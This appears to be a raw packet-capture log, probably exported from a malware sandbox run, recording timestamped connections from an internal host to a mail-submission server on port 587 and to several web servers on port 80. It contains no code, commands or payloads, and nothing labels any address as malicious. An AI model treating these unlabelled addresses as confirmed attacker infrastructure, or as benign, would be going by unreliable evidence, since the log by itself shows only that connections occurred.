Nov 28, 2024 06:43:12.910684109 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.910756111 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.918931961 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:13.020735025 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.042778015 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.309623957 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.316813946 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:13.335266113 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.338583946 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:13.356466055 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:13.356539965 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:13.356627941 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:13.356664896 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:13.440725088 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.462435007 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.480669022 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:13.729605913 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.730031967 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:13.755321980 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.755522013 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:13.846402884 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:13.853954077 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.879326105 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:13.970374107 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:13.970464945 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:13.970741034 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:13.970741034 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:14.094523907 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:14.094552040 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:14.143269062 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.143942118 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:14.171937943 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.172991991 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:14.267785072 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.296858072 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.566459894 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.566656113 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:14.592206001 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.594635010 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:14.690490961 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.718417883 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.979428053 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:14.983051062 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.010946989 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.013262987 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.106914997 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.137007952 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.399271011 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.430035114 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:15.430146933 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:15.430269003 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:15.431572914 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.433191061 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.433341026 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.439378023 CET	49908	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:15.555401087 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.557040930 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.563079119 CET	80	49908	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:15.844239950 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.844846010 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.844908953 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.845144987 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.845204115 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.846947908 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.849349976 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.849646091 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.849684954 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.849805117 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.849838018 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.851342916 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.934375048 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:15.968794107 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.968877077 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.969094992 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.969105959 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.969273090 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.970663071 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.970731974 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.970834017 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.970918894 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.970921993 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.970993996 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.970993996 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.971090078 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.971103907 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.971148968 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.971155882 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.971167088 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.971214056 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.971237898 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.971596956 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.973294020 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.973351002 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.973447084 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.973491907 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.973542929 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.973587990 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975120068 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975193977 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975209951 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975244999 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975271940 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975292921 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975311041 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975332022 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975370884 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975385904 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975425959 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975516081 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975526094 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975554943 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975581884 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:15.975615025 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:15.975656986 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.058254957 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:16.058343887 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:16.058494091 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:16.058532000 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:16.092922926 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.094389915 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.094474077 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.094697952 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.094784021 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.094846010 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.094917059 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095087051 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095168114 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.095201015 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095237970 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095279932 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.095303059 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.095318079 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095370054 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.095419884 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095469952 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.095499039 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.095560074 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.097076893 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.097259045 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.097312927 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.098999023 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099081039 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099129915 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.099227905 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099266052 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.099303961 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099430084 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099481106 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.099486113 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099565029 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099612951 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.099647999 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099781036 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.099837065 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.136171103 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.137461901 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.140135050 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.140997887 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.182301998 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:16.182317019 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:16.218403101 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.218472958 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.218565941 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.218596935 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.218676090 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.218744040 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219002962 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219141960 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219254971 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219408035 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219598055 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219609976 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219705105 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219769001 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219878912 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219888926 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219964027 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.219980955 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220072985 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220103979 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220221996 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220254898 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220361948 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220379114 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220489979 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220499039 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.220572948 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.221084118 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.221194983 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.221257925 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.222896099 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.222984076 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223078012 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223138094 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223237991 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223321915 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223387003 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223551989 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223562002 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223572016 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223654032 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223664045 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223752975 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223762035 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223795891 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223843098 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223886967 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.223946095 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224026918 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224064112 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224136114 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224162102 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224252939 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.224365950 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.261285067 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.261416912 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.264772892 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.264826059 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.342442036 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.342454910 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.342510939 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.342520952 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.342530012 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.345026970 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.345040083 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.345124960 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.345141888 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.345205069 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.746814013 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.762463093 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:16.826087952 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:16.826087952 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:17.419086933 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:17.419205904 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:17.419285059 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:17.420264959 CET	49909	80	192.168.2.4	35.164.78.200
Nov 28, 2024 06:43:17.543971062 CET	80	49909	35.164.78.200	192.168.2.4
Nov 28, 2024 06:43:17.923530102 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:18.047380924 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:18.047472000 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:18.047890902 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:18.047915936 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:18.171708107 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:18.171725988 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:19.147612095 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:19.147757053 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:19.147818089 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:19.147927999 CET	49910	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:43:19.271629095 CET	80	49910	3.94.10.34	192.168.2.4
Nov 28, 2024 06:43:19.552148104 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:19.675894976 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:19.676976919 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:19.677129984 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:19.677148104 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:19.800813913 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:19.800900936 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:20.934308052 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:20.939409971 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:20.939459085 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:21.063288927 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:21.063308001 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:21.343549013 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:21.393697977 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:21.393769026 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:21.393778086 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:21.397033930 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:21.443900108 CET	49911	80	192.168.2.4	165.160.15.20
Nov 28, 2024 06:43:21.567605019 CET	80	49911	165.160.15.20	192.168.2.4
Nov 28, 2024 06:43:22.128896952 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:22.252872944 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:22.253396988 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:22.253714085 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:22.253879070 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:22.377451897 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:22.377585888 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:23.247528076 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:23.371640921 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:23.621820927 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:23.621917009 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:23.622019053 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:23.622514009 CET	49912	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:23.719038963 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:23.719844103 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:23.720599890 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:23.746145964 CET	80	49912	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:23.844351053 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:23.846954107 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:24.328012943 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.328490019 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.456213951 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:24.456231117 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:24.456334114 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.456342936 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.456533909 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.456543922 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:24.580634117 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:24.580647945 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:25.154645920 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:25.157038927 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:25.280822039 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:25.580255032 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:25.581249952 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:25.581556082 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:25.584053040 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:25.584095955 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:25.705836058 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:25.708009005 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:25.708019018 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:25.964538097 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:26.029191971 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:26.036823034 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.037296057 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:26.161052942 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.465789080 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.465850115 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.465862989 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.465903997 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:26.469362974 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:26.476852894 CET	49915	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:26.593147993 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:26.600563049 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:26.600626945 CET	49915	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:26.601167917 CET	49915	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:26.601336956 CET	49915	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:26.724872112 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:26.724977970 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:26.892461061 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:27.006490946 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:27.130393982 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:27.429440975 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:27.429688931 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:27.553466082 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:27.853533983 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:27.853806019 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:27.977669954 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:28.032491922 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:28.092088938 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:28.092158079 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:28.092787027 CET	49915	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:28.092814922 CET	49915	80	192.168.2.4	18.246.231.120
